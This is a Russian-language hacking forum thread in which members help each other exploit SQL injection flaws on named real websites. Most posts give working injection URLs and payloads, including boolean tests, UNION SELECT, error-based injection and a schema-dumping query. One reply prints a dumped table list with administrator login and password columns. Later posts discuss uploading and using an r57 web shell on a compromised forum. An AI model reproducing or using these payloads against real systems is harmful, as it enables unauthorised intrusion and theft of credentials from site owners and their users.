Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. contreil

    contreil New Member

    Joined:
    11 Jul 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Всем привет! А как узнать у определенного сайта на каком фаерволе он сидит?
     
  2. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    Идиотский вопрос такой)))) Спроси кто сервер админит.
     
  3. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    если ты имеешь ввиду WAF, то смотреть коды возвращаемых ошибок, куки; либо задетектить стандартные правила, характерные для конкретного WAF'a. Если же ты говоришь о том, что непосредственно защищает сам сервер, то порутать его и посмотреть что на нём запущенно.
    статью прочитать.
     
  4. contreil

    contreil New Member

    Joined:
    11 Jul 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    И на этом спасибо!
     
  5. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Ы, кавычку нужно писать, когда переменная имеет тип string. Чтобы выйти из значения переменной и дописать свой SQL запрос. А когда переменная типа integer - кавычка ни в коем случае не нужна! И еще нужно помнить, что когда переменная типа string мы всегда должны в конце ставить комментарий ( -- ), чтобы убрать лишнюю кавычку, которая осталась.
     
    3 people like this.
  6. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    ну в статьях как бы всё расписано(даже если не написано и ты не можешь понять, то наверно надо изучать не с этого)

    1. Ковычка используется при запросах вида
    "SELECT * FROM table WHERE param='".$_GET['param']."'"
    ковычкой мы закрываем предыдущую ковычку.
    Проверить просто:
    http://www.riviera-crimea.com/detail.php?id=421+and+1=1 - отображает
    http://www.riviera-crimea.com/detail.php?id=421+and+1=2 - отображает
    значит мы не влияем на запрос, т. к. мы должны были получить пустой результат 421+and+1=2 (true and false = false)
    "SELECT * FROM table WHERE param='421 and 1=2'"
    2. С кавычкой
    http://www.riviera-crimea.com/detail.php?id=421'+and+1=1--+ - отображает
    http://www.riviera-crimea.com/detail.php?id=421'+and+1=2--+ - не отображает
    значит запрос составлен верно
    "SELECT * FROM table WHERE param='421' and 1=2--+'"
    3. -421 это то вместо чего я использую 421 and 1=2(что как и -421 возвращает пустой запрос и можно вписать свой через union select)
     
    3 people like this.
  7. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    может кто помочь или нет?
    Code:
    http://www.maykoplat.ru/index.php?id=1' AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 #
    не могу даже название бд узнать
     
  8. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    параметры(те что отсылаются при нажатии кнопки "оплата") для поста на корень сайта
    Code:
    action=pay&id=213123'+and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x   from information_schema.tables group by x)a)--+'&email=a%40a.ru&submit_button=%CE%CF%CB%C0%D2%C0
    юзается Error-based SQL-Injection, вместо version() подставлять (select 1) или (select group_concat(table_name) from information_schema.tables), ну и так далее
     
    #17408 Melfis, 22 Jul 2011
    Last edited: 22 Jul 2011
    1 person likes this.
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    В чем собственно проблема? Вывод в исходнике:
    Code:
    www.maykoplat.ru/index.php?id=1'and(1=0)union+select(1),2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,"\r\n",table_schema,0x2e,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48--+'1
    Code:
    vsemayki_ru.admin_stat:id
    vsemayki_ru.admin_stat:data
    vsemayki_ru.admin_stat:name
    vsemayki_ru.admin_user:ID
    vsemayki_ru.admin_user:LOGIN
    vsemayki_ru.admin_user:PASSWORD
    vsemayki_ru.admin_user:NAME
    vsemayki_ru.admin_user:EMAIL
    vsemayki_ru.admin_user:ACTIVE
    vsemayki_ru.admin_user:DATE_LAST
    vsemayki_ru.admin_user:ISADMIN
    vsemayki_ru.admin_user:IP
    vsemayki_ru.admin_user:stage2
    vsemayki_ru.admin_user:stage3
    vsemayki_ru.admin_user:stage4
    vsemayki_ru.admin_user:stage5
    vsemayki_ru.admin_user:stage6
    vsemayki_ru.admin_user:stage7
    vsemayki_ru.admin_user:stage8
    vsemayki_ru.admin_user:stage9
    vsemayki_ru.admin_user:stage10
    vsemayki_ru.admin_user:stage11
    vsemayki_ru.admin_user:stage12
    vsemayki_ru.admin_user:stage13
    vsemayki_ru.admin_user:stage14
    vsemayki_ru.admin_user:stage15
    vsemayki_ru.admin_user:stage16
    vsemayki_ru.admin_user:stage17
    vsemayki_ru.admin_user:stage18
    vsemayki_ru.admin_user:sklad
    vsemayki_ru.admin_user:stage19
    vsemayki_ru.admin_user:stages20
    vsemayki_ru.admin_user:stages21
    vsemayki_ru.admin_user:stages22
    vsemayki_ru.admin_user:department
    vsemayki_ru.admin_user:phone
    vsemayki_ru.admin_user_login:admin_login_id
    vsemayki_ru.admin_user_login:parent
    vsemayki_ru.admin_user_login:datetime
    vsemayki_ru.admin_user_login:ip
    vsemayki_ru.admin_user_login:type
    vsemayki_ru.admin_user_login:succes
    vsemayki_ru.admin_user_parts:ID
    vsemayki_ru.admin_user_parts:admin_user
    vsemayki_ru.admin_user_parts:module
    vsemayki_ru.admin_user_parts:module_key
    vsemayki_ru.admin_user_parts:iswrite
    
     
    _________________________
    #17409 Expl0ited, 22 Jul 2011
    Last edited: 22 Jul 2011
    1 person likes this.
  10. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.gagauzia.md/search.php
    sql в поиске, реально раскрутить?
     
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    'and(1=0)union(select(1),2,3,4,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),6)#
    Учи синтаксис запросов!
     
    _________________________
    1 person likes this.
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Каким запросом подобрано кол-во полей допишите, пожалуйста ?
    Так не получается :
    'order(by(6))#
     
  13. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Логику запроса посмотри, там и без order by легко можно обойтись, а даже если и использовать то конструкция которую ты привел не допустима, на вышеупомянутом сайте идет разделение слов по пробелу и осуществляется поиск по словам, а значит нам нужно составить запрос без пробелов, вариантов много, я предпочел бы order/**/by(NUM)
     
    _________________________
    1 person likes this.
  14. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    http://opulent-style.com/view_item.php?id=1+and+substring%28%28SELECT%202%29,1,1%29=1

    реально ли такую инъекцию не как слепую крутить?

    http://opulent-style.com/view_item.php?id=1%20order%20by%202

    Unknown column '2' in 'order clause' :(
     
  15. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    SELECT Вложеный в UPDATE. Этот вариант во много раз удобнее обычной инъекции. Вывести информацию можно через ошибку, а при надобности даже заменить её на свою(Добавить пользователя, редактировать новость).
     
    #17415 randman, 23 Jul 2011
    Last edited: 23 Jul 2011
  16. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    не могли бы вы показать пример использования?

    выполняется UPDATE с ошибкой

    выполняется SELECT...
     
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    вот пример синтаксиса как можно использовать UPDATE но естественно тебе надо знать какие есть таблици для формирования правельного запроса...
    и логично что кавычки не должны фильтроваться и слешироваться. а они там слешируются _http://www.opulent-style.com/view_item.php?id=1%27
     
    _________________________
  18. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    залил шелл на форум. Когда уже иду по линку шела, он какбы грузится, но вместо файлов ничего нету. Вот пример
    http://pikucha.ru/i5KrG
     
  19. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    залей r57 и будешь видеть файлы...или пользуйся консолью для просмотра файлов
     
  20. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Почему обязательно? Можно перевести значения переменных в hex...

    А так, можно крутить через error based.
    http://www.opulent-style.com/view_item.php?id=1%20or%20(select%20count(*)from(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(mid((select%20version()),1,64),floor(rand(0)*2)))
     
    #17420 ZARO, 24 Jul 2011
    Last edited: 24 Jul 2011
Thread Status:
Not open for further replies.